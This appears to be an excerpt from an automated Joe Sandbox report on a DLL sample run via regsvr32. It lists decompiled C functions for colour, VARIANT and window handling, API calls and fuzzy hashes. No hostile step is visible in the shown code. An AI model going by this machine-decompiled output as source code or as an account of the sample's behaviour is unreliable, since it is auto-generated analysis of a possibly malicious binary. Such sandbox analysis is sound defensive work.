                                                                                                                				_t19 = GetModuleHandleA("user32.dll");
                                                                                                                				if(_t19 != 0) {
                                                                                                                					 *0x100bda3c = GetProcAddress(_t19, "NotifyWinEvent");
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 100346DC
                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 100346E4
                                                                                                                  • Part of subcall function 1001D754: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 1001D795
                                                                                                                  • Part of subcall function 1001D754: SetLastError.KERNEL32(0000006F), ref: 1001D7AF
                                                                                                                • GetModuleHandleA.KERNEL32(user32.dll), ref: 10034736
                                                                                                                • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 10034746
                                                                                                                  • Part of subcall function 10034554: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10034597
                                                                                                                  • Part of subcall function 10034554: PathFindExtensionA.SHLWAPI(?), ref: 100345B1
                                                                                                                  • Part of subcall function 10034554: __strdup.LIBCMT ref: 100345F3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorModule$FileModeName$AddressExtensionFindHandleLastPathProc__strdup
                                                                                                                • String ID: NotifyWinEvent$user32.dll
                                                                                                                • API String ID: 2454351968-597752486
                                                                                                                • Opcode ID: 04f07cf9e20774bfcc8e7641e955138858760e64506312998a73ea294dbfa3f7
                                                                                                                • Instruction ID: 16731b763caebe92f11a0247663d23a88967268bfc2b9bd7345bcb11f66c0e51
                                                                                                                • Opcode Fuzzy Hash: 04f07cf9e20774bfcc8e7641e955138858760e64506312998a73ea294dbfa3f7
                                                                                                                • Instruction Fuzzy Hash: 77018FB8A142508FD701EF24D849A9D3BD4EF05711F06849AF5598F262DB34EC808F62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1002128F(void* __ecx) {
                                                                                                                				struct HBRUSH__* _t14;
                                                                                                                				void* _t18;
                                                                                                                
                                                                                                                				_t18 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
                                                                                                                				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
                                                                                                                				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
                                                                                                                				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
                                                                                                                				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
                                                                                                                				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
                                                                                                                				_t14 = GetSysColorBrush(6);
                                                                                                                				 *(_t18 + 0x20) = _t14;
                                                                                                                				return _t14;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Brush
                                                                                                                • String ID:
                                                                                                                • API String ID: 2798902688-0
                                                                                                                • Opcode ID: 8e77d5a660d64319e0ea3c320286592cf55ccb3bfd1d15ac1e67bc420ebbae40
                                                                                                                • Instruction ID: 0cc9ecc0ec31c172d87fef68e107198179d5a768bc50f180919af15bb17b9774
                                                                                                                • Opcode Fuzzy Hash: 8e77d5a660d64319e0ea3c320286592cf55ccb3bfd1d15ac1e67bc420ebbae40
                                                                                                                • Instruction Fuzzy Hash: 76F0FE719407445BE730BF724D49B47BAD1FFC4710F16092EE2818B990D6B5E0419F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E10032245(void* __ebx, void* __ecx, signed short __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t163;
                                                                                                                				signed short _t178;
                                                                                                                				signed int _t184;
                                                                                                                				signed short _t185;
                                                                                                                				intOrPtr* _t187;
                                                                                                                				void* _t189;
                                                                                                                				signed short _t198;
                                                                                                                				signed short _t200;
                                                                                                                				signed int _t203;
                                                                                                                				signed short _t206;
                                                                                                                				signed short _t213;
                                                                                                                				signed short _t215;
                                                                                                                				signed short _t224;
                                                                                                                				long long* _t231;
                                                                                                                				intOrPtr* _t235;
                                                                                                                				void* _t237;
                                                                                                                				void* _t243;
                                                                                                                				void* _t246;
                                                                                                                				intOrPtr* _t248;
                                                                                                                				void* _t254;
                                                                                                                				void* _t257;
                                                                                                                				signed int _t260;
                                                                                                                				signed short _t261;
                                                                                                                				signed short _t262;
                                                                                                                				signed short _t266;
                                                                                                                				signed short _t270;
                                                                                                                				intOrPtr* _t271;
                                                                                                                				void* _t281;
                                                                                                                				signed short _t295;
                                                                                                                				void* _t339;
                                                                                                                				void* _t341;
                                                                                                                				signed short _t343;
                                                                                                                				void* _t344;
                                                                                                                				intOrPtr* _t345;
                                                                                                                				signed int _t346;
                                                                                                                				void* _t348;
                                                                                                                				intOrPtr _t352;
                                                                                                                				signed long long _t358;
                                                                                                                
                                                                                                                				_t342 = __esi;
                                                                                                                				_t337 = __edx;
                                                                                                                				_t282 = __ecx;
                                                                                                                				_t346 = _t348 - 0x64;
                                                                                                                				_t163 =  *0x100b9e70; // 0xbb35530
                                                                                                                				 *(_t346 + 0x68) = _t163 ^ _t346;
                                                                                                                				_push(0xcc);
                                                                                                                				E1004764D(0x100908cd, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t346 + 0x4c)) =  *((intOrPtr*)(_t346 + 0x74));
                                                                                                                				_t339 = __ecx;
                                                                                                                				 *(_t346 + 0x30) = 0;
                                                                                                                				_t352 =  *((intOrPtr*)(__ecx + 0x48));
                                                                                                                				_t353 = _t352 == 0;
                                                                                                                				if(_t352 == 0) {
                                                                                                                					L1:
                                                                                                                					E1000A069(0, _t282, _t339, _t342, _t353);
                                                                                                                				}
                                                                                                                				if((0 |  *((intOrPtr*)(_t339 + 0x54)) != 0x00000000) == 0) {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				E100235FF(_t346 + 0x3c);
                                                                                                                				_t343 = 3;
                                                                                                                				 *((intOrPtr*)(_t346 - 4)) = 0;
                                                                                                                				 *(_t346 + 0x50) = _t343;
                                                                                                                				E1002FC83(0,  *((intOrPtr*)(_t339 + 0x54)), _t346,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
                                                                                                                				if( *(_t346 + 0x50) != _t343) {
                                                                                                                					_t340 =  *((intOrPtr*)(_t339 + 0x54));
                                                                                                                					_t178 = E1002DAF2( *((intOrPtr*)(_t339 + 0x54)), __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
                                                                                                                					__eflags = _t178;
                                                                                                                					if(_t178 == 0) {
                                                                                                                						goto L4;
                                                                                                                					} else {
                                                                                                                						_t184 =  *(_t346 + 0x50) & 0x0000ffff;
                                                                                                                						_t345 = __imp__#9;
                                                                                                                						__eflags = _t184 - 0x81;
                                                                                                                						if(__eflags > 0) {
                                                                                                                							_t185 = _t184 - 0x82;
                                                                                                                							__eflags = _t185;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								goto L50;
                                                                                                                							} else {
                                                                                                                								_t198 = _t185 - 1;
                                                                                                                								__eflags = _t198;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									_t200 = E1002F8B0(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
                                                                                                                									__eflags = _t200;
                                                                                                                									if(_t200 != 0) {
                                                                                                                										__eflags =  *(_t346 + 0x55);
                                                                                                                										asm("fild qword [ebp+0x57]");
                                                                                                                										if( *(_t346 + 0x55) > 0) {
                                                                                                                											do {
                                                                                                                												_t139 = _t346 + 0x55;
                                                                                                                												 *_t139 =  *(_t346 + 0x55) - 1;
                                                                                                                												__eflags =  *_t139;
                                                                                                                												_t358 = _t358 /  *0x10099e60;
                                                                                                                											} while ( *_t139 != 0);
                                                                                                                										}
                                                                                                                										__eflags =  *(_t346 + 0x56);
                                                                                                                										if( *(_t346 + 0x56) == 0) {
                                                                                                                											asm("fchs");
                                                                                                                										}
                                                                                                                										 *(_t346 - 0x14) = _t358;
                                                                                                                										 *(_t346 - 0x1c) = 5;
                                                                                                                										 *((char*)(_t346 - 4)) = 0xe;
                                                                                                                										E100235DF(_t346 - 0x1c, _t346 + 0x3c, _t346 - 0x1c);
                                                                                                                										_t203 = _t346 - 0x1c;
                                                                                                                										goto L30;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									_t206 = _t198;
                                                                                                                									__eflags = _t206;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										__eflags = E1002F8DA(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
                                                                                                                										if(__eflags != 0) {
                                                                                                                											asm("fldz");
                                                                                                                											 *(_t346 + 0x58) = _t358;
                                                                                                                											_t337 =  *(_t346 + 0x34);
                                                                                                                											 *((intOrPtr*)(_t346 + 0x60)) = 0;
                                                                                                                											E10023C56(_t346 + 0x58, _t340, __eflags,  *(_t346 + 0x34),  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff, 0, 0, 0);
                                                                                                                											 *_t346 = 7;
                                                                                                                											 *(_t346 + 8) =  *(_t346 + 0x58);
                                                                                                                											 *((char*)(_t346 - 4)) = 0xf;
                                                                                                                											E100235DF(_t346, _t346 + 0x3c, _t346);
                                                                                                                											_t203 = _t346;
                                                                                                                											goto L30;
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										_t213 = _t206 - 1;
                                                                                                                										__eflags = _t213;
                                                                                                                										if(__eflags == 0) {
                                                                                                                											_t215 = E1002F90F(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
                                                                                                                											__eflags = _t215;
                                                                                                                											if(_t215 != 0) {
                                                                                                                												asm("fldz");
                                                                                                                												 *(_t346 + 0x58) = _t358;
                                                                                                                												 *((intOrPtr*)(_t346 + 0x60)) = 0;
                                                                                                                												E1002D958( *(_t346 + 0x34) & 0x0000ffff,  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff);
                                                                                                                												 *(_t346 - 0x4c) = 7;
                                                                                                                												 *(_t346 - 0x44) =  *(_t346 + 0x58);
                                                                                                                												 *((char*)(_t346 - 4)) = 0x10;
                                                                                                                												E100235DF(_t346 - 0x4c, _t346 + 0x3c, _t346 - 0x4c);
                                                                                                                												_t203 = _t346 - 0x4c;
                                                                                                                												goto L30;
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											__eflags = _t213 - 1;
                                                                                                                											if(__eflags == 0) {
                                                                                                                												_t224 = E1002F944(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
                                                                                                                												__eflags = _t224;
                                                                                                                												if(_t224 != 0) {
                                                                                                                													_t231 = E1002FBC6(_t346 - 0xd8,  *((short*)(_t346 + 0x54)),  *(_t346 + 0x56) & 0x0000ffff,  *(_t346 + 0x58) & 0x0000ffff,  *(_t346 + 0x5a) & 0x0000ffff,  *(_t346 + 0x5c) & 0x0000ffff,  *(_t346 + 0x5e) & 0x0000ffff);
                                                                                                                													 *(_t346 - 0x3c) = 7;
                                                                                                                													 *((long long*)(_t346 - 0x34)) =  *_t231;
                                                                                                                													 *((char*)(_t346 - 4)) = 0x11;
                                                                                                                													E100235DF(_t346 - 0x3c, _t346 + 0x3c, _t346 - 0x3c);
                                                                                                                													_t203 = _t346 - 0x3c;
                                                                                                                													goto L30;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t235 = E1000B543(0, _t346 + 0x50, _t340, _t345, __eflags);
                                                                                                                								 *((char*)(_t346 - 4)) = 2;
                                                                                                                								_t237 = E10025968(_t346 - 0xbc, _t337, _t340, _t345, __eflags);
                                                                                                                								 *((char*)(_t346 - 4)) = 3;
                                                                                                                								E100235DF(_t237, _t346 + 0x3c, _t237);
                                                                                                                								 *_t345(_t346 - 0xbc,  *_t235, 8, E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
                                                                                                                								_t295 =  *(_t346 + 0x50);
                                                                                                                								goto L51;
                                                                                                                							} else {
                                                                                                                								__eflags = _t184 - 8;
                                                                                                                								if(__eflags > 0) {
                                                                                                                									__eflags = _t184 - 0xb;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_t243 = E10023391(_t346 - 0x9c,  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 0xb);
                                                                                                                										 *((char*)(_t346 - 4)) = 0xb;
                                                                                                                										E100235DF(_t243, _t346 + 0x3c, _t243);
                                                                                                                										_t203 = _t346 - 0x9c;
                                                                                                                										goto L30;
                                                                                                                									} else {
                                                                                                                										__eflags = _t184 - 0xc;
                                                                                                                										if(__eflags == 0) {
                                                                                                                											_t246 = E10023D77(_t346 - 0x8c, E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
                                                                                                                											 *((char*)(_t346 - 4)) = 1;
                                                                                                                											E100235DF(_t246, _t346 + 0x3c, _t246);
                                                                                                                											_t203 = _t346 - 0x8c;
                                                                                                                											goto L30;
                                                                                                                										} else {
                                                                                                                											__eflags = _t184 - 0xf;
                                                                                                                											if(_t184 > 0xf) {
                                                                                                                												__eflags = _t184 - 0x11;
                                                                                                                												if(__eflags <= 0) {
                                                                                                                													_t248 = E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
                                                                                                                													 *(_t346 - 0x5c) = 0x11;
                                                                                                                													 *((char*)(_t346 - 0x54)) =  *_t248;
                                                                                                                													 *((char*)(_t346 - 4)) = 6;
                                                                                                                													E100235DF(_t346 - 0x5c, _t346 + 0x3c, _t346 - 0x5c);
                                                                                                                													_t203 = _t346 - 0x5c;
                                                                                                                													goto L30;
                                                                                                                												} else {
                                                                                                                													__eflags = _t184 - 0x12;
                                                                                                                													if(__eflags == 0) {
                                                                                                                														goto L27;
                                                                                                                													} else {
                                                                                                                														__eflags = _t184 - 0x13;
                                                                                                                														if(__eflags == 0) {
                                                                                                                															goto L26;
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									if(__eflags == 0) {
                                                                                                                										L50:
                                                                                                                										_t187 = E1000B053(0, _t346 + 0x30, _t340, _t345, __eflags);
                                                                                                                										 *((char*)(_t346 - 4)) = 4;
                                                                                                                										_t189 = E10025968(_t346 - 0xcc, _t337, _t340, _t345, __eflags);
                                                                                                                										 *((char*)(_t346 - 4)) = 5;
                                                                                                                										E100235DF(_t189, _t346 + 0x3c, _t189);
                                                                                                                										 *_t345(_t346 - 0xcc,  *_t187, 8, E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
                                                                                                                										_t295 =  *(_t346 + 0x30);
                                                                                                                										L51:
                                                                                                                										__eflags = _t295 + 0xfffffff0;
                                                                                                                										 *((char*)(_t346 - 4)) = 0;
                                                                                                                										L100013E3(_t295 + 0xfffffff0, _t337);
                                                                                                                									} else {
                                                                                                                										_t260 = _t184;
                                                                                                                										__eflags = _t260;
                                                                                                                										if(__eflags == 0) {
                                                                                                                											L27:
                                                                                                                											_t254 = E10023391(_t346 - 0xac,  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 2);
                                                                                                                											 *((char*)(_t346 - 4)) = 7;
                                                                                                                											E100235DF(_t254, _t346 + 0x3c, _t254);
                                                                                                                											_t203 = _t346 - 0xac;
                                                                                                                											goto L30;
                                                                                                                										} else {
                                                                                                                											_t261 = _t260 - 1;
                                                                                                                											__eflags = _t261;
                                                                                                                											if(__eflags == 0) {
                                                                                                                												L26:
                                                                                                                												_t257 = E100233B8(_t346 - 0x7c,  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))), 3);
                                                                                                                												 *((char*)(_t346 - 4)) = 8;
                                                                                                                												E100235DF(_t257, _t346 + 0x3c, _t257);
                                                                                                                												_t203 = _t346 - 0x7c;
                                                                                                                												goto L30;
                                                                                                                											} else {
                                                                                                                												_t262 = _t261 - 1;
                                                                                                                												__eflags = _t262;
                                                                                                                												if(__eflags == 0) {
                                                                                                                													 *(_t346 + 0x50) =  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
                                                                                                                													 *(_t346 + 0x10) = 4;
                                                                                                                													 *(_t346 + 0x18) =  *(_t346 + 0x50);
                                                                                                                													 *((char*)(_t346 - 4)) = 9;
                                                                                                                													E100235DF(_t346 + 0x10, _t346 + 0x3c, _t346 + 0x10);
                                                                                                                													_t203 = _t346 + 0x10;
                                                                                                                													goto L30;
                                                                                                                												} else {
                                                                                                                													_t266 = _t262 - 1;
                                                                                                                													__eflags = _t266;
                                                                                                                													if(__eflags == 0) {
                                                                                                                														 *(_t346 - 0x24) =  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
                                                                                                                														 *(_t346 - 0x2c) = 5;
                                                                                                                														 *((char*)(_t346 - 4)) = 0xa;
                                                                                                                														E100235DF(_t346 - 0x2c, _t346 + 0x3c, _t346 - 0x2c);
                                                                                                                														_t203 = _t346 - 0x2c;
                                                                                                                														goto L30;
                                                                                                                													} else {
                                                                                                                														_t270 = _t266 - 1;
                                                                                                                														__eflags = _t270;
                                                                                                                														if(__eflags == 0) {
                                                                                                                															_t271 = E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
                                                                                                                															 *(_t346 + 0x20) = 6;
                                                                                                                															 *((intOrPtr*)(_t346 + 0x28)) =  *_t271;
                                                                                                                															 *((intOrPtr*)(_t346 + 0x2c)) =  *((intOrPtr*)(_t271 + 4));
                                                                                                                															 *((char*)(_t346 - 4)) = 0xd;
                                                                                                                															E100235DF(_t346 + 0x20, _t346 + 0x3c, _t346 + 0x20);
                                                                                                                															_t203 = _t346 + 0x20;
                                                                                                                															goto L30;
                                                                                                                														} else {
                                                                                                                															__eflags = _t270 - 1;
                                                                                                                															if(__eflags == 0) {
                                                                                                                																 *(_t346 - 0x64) =  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
                                                                                                                																 *(_t346 - 0x6c) = 7;
                                                                                                                																 *((char*)(_t346 - 4)) = 0xc;
                                                                                                                																E100235DF(_t346 - 0x6c, _t346 + 0x3c, _t346 - 0x6c);
                                                                                                                																_t203 = _t346 - 0x6c;
                                                                                                                																L30:
                                                                                                                																 *((char*)(_t346 - 4)) = 0;
                                                                                                                																 *_t345(_t203);
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						E10023D97( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
                                                                                                                						 *_t345(_t346 + 0x3c);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L4:
                                                                                                                					E10023D97( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
                                                                                                                					__imp__#9(_t346 + 0x3c);
                                                                                                                				}
                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t346 - 0xc));
                                                                                                                				_pop(_t341);
                                                                                                                				_pop(_t344);
                                                                                                                				_pop(_t281);
                                                                                                                				return E1004763E( *((intOrPtr*)(_t346 + 0x4c)), _t281,  *(_t346 + 0x68) ^ _t346, _t337, _t341, _t344);
                                                                                                                			}










































                                                                                                                0x1003241a
                                                                                                                0x1003241a
                                                                                                                0x1003241d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003241d
                                                                                                                0x10032418
                                                                                                                0x10032413
                                                                                                                0x1003240a
                                                                                                                0x10032401
                                                                                                                0x1003230c
                                                                                                                0x1003230c
                                                                                                                0x100326dd
                                                                                                                0x100326eb
                                                                                                                0x100326fb
                                                                                                                0x100326ff
                                                                                                                0x10032708
                                                                                                                0x1003270c
                                                                                                                0x10032718
                                                                                                                0x1003271a
                                                                                                                0x1003271d
                                                                                                                0x1003271d
                                                                                                                0x10032720
                                                                                                                0x10032723
                                                                                                                0x10032312
                                                                                                                0x10032313
                                                                                                                0x10032313
                                                                                                                0x10032314
                                                                                                                0x1003244e
                                                                                                                0x10032464
                                                                                                                0x1003246d
                                                                                                                0x10032471
                                                                                                                0x10032476
                                                                                                                0x00000000
                                                                                                                0x1003231a
                                                                                                                0x1003231a
                                                                                                                0x1003231a
                                                                                                                0x1003231b
                                                                                                                0x10032423
                                                                                                                0x10032434
                                                                                                                0x1003243d
                                                                                                                0x10032441
                                                                                                                0x10032446
                                                                                                                0x00000000
                                                                                                                0x10032321
                                                                                                                0x10032321
                                                                                                                0x10032321
                                                                                                                0x10032322
                                                                                                                0x100323ce
                                                                                                                0x100323d1
                                                                                                                0x100323da
                                                                                                                0x100323e4
                                                                                                                0x100323e8
                                                                                                                0x100323ed
                                                                                                                0x00000000
                                                                                                                0x10032328
                                                                                                                0x10032328
                                                                                                                0x10032328
                                                                                                                0x10032329
                                                                                                                0x100323a1
                                                                                                                0x100323a4
                                                                                                                0x100323b1
                                                                                                                0x100323b5
                                                                                                                0x100323ba
                                                                                                                0x00000000
                                                                                                                0x1003232b
                                                                                                                0x1003232b
                                                                                                                0x1003232b
                                                                                                                0x1003232c
                                                                                                                0x10032367
                                                                                                                0x10032371
                                                                                                                0x10032377
                                                                                                                0x1003237a
                                                                                                                0x10032384
                                                                                                                0x10032388
                                                                                                                0x1003238d
                                                                                                                0x00000000
                                                                                                                0x1003232e
                                                                                                                0x1003232e
                                                                                                                0x1003232f
                                                                                                                0x10032341
                                                                                                                0x10032344
                                                                                                                0x10032351
                                                                                                                0x10032355
                                                                                                                0x1003235a
                                                                                                                0x100324d1
                                                                                                                0x100324d2
                                                                                                                0x100324d5
                                                                                                                0x100324d5
                                                                                                                0x1003232f
                                                                                                                0x1003232c
                                                                                                                0x10032329
                                                                                                                0x10032322
                                                                                                                0x1003231b
                                                                                                                0x10032314
                                                                                                                0x1003230c
                                                                                                                0x10032306
                                                                                                                0x100322fd
                                                                                                                0x1003272f
                                                                                                                0x10032738
                                                                                                                0x10032738
                                                                                                                0x100322b6
                                                                                                                0x100322b6
                                                                                                                0x100322bd
                                                                                                                0x100322c6
                                                                                                                0x100322c6
                                                                                                                0x10032740
                                                                                                                0x10032748
                                                                                                                0x10032749
                                                                                                                0x1003274a
                                                                                                                0x10032759

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10032261
                                                                                                                • VariantClear.OLEAUT32(?), ref: 100322C6
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • VariantClear.OLEAUT32(?), ref: 100324D5
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10032547
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10032738
                                                                                                                  • Part of subcall function 100235DF: VariantCopy.OLEAUT32(00000000,00000000), ref: 100235ED
                                                                                                                  • Part of subcall function 1000B543: __EH_prolog3.LIBCMT ref: 1000B54A
                                                                                                                  • Part of subcall function 10025968: __EH_prolog3.LIBCMT ref: 10025972
                                                                                                                  • Part of subcall function 10025968: lstrlenA.KERNEL32(?,?,?,00000224), ref: 10025991
                                                                                                                  • Part of subcall function 10025968: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 10025999
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearH_prolog3$AllocByteCopyException@8StringThrowlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1021156189-0
                                                                                                                • Opcode ID: 41d82c729fe2f8260028a4ca9dc4131b6792d18636b98becd0ca89b7d9f04e1c
                                                                                                                • Instruction ID: a0bcb12857ba3903d996966c8cd61b66d77702176a5ef2efd29989c3a65c1587
                                                                                                                • Opcode Fuzzy Hash: 41d82c729fe2f8260028a4ca9dc4131b6792d18636b98becd0ca89b7d9f04e1c
                                                                                                                • Instruction Fuzzy Hash: 0CF17C3590024CEEDF06DFA0D890AED7BB9FF08341F90805AFC5597252DB74AA88DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10043D2F: PeekMessageA.USER32(00000000,00000000,0000000F,0000000F,00000000), ref: 10043D70
                                                                                                                  • Part of subcall function 10043D2F: SetRectEmpty.USER32(?), ref: 10043D94
                                                                                                                  • Part of subcall function 10043D2F: GetDesktopWindow.USER32 ref: 10043DAC
                                                                                                                  • Part of subcall function 10043D2F: LockWindowUpdate.USER32(?), ref: 10043DBD
                                                                                                                  • Part of subcall function 10043D2F: GetDCEx.USER32 ref: 10043DD4
                                                                                                                  • Part of subcall function 1000C15D: GetModuleHandleA.KERNEL32(GDI32.DLL,?,10044440), ref: 1000C165
                                                                                                                  • Part of subcall function 1000C15D: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 1000C171
                                                                                                                • GetWindowRect.USER32 ref: 10044466
                                                                                                                  • Part of subcall function 1000C193: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,1004444D,00000000), ref: 1000C19C
                                                                                                                  • Part of subcall function 1000C193: GetProcAddress.KERNEL32(00000000,SetLayout,?,?,1004444D,00000000), ref: 1000C1AA
                                                                                                                • InflateRect.USER32 ref: 10044558
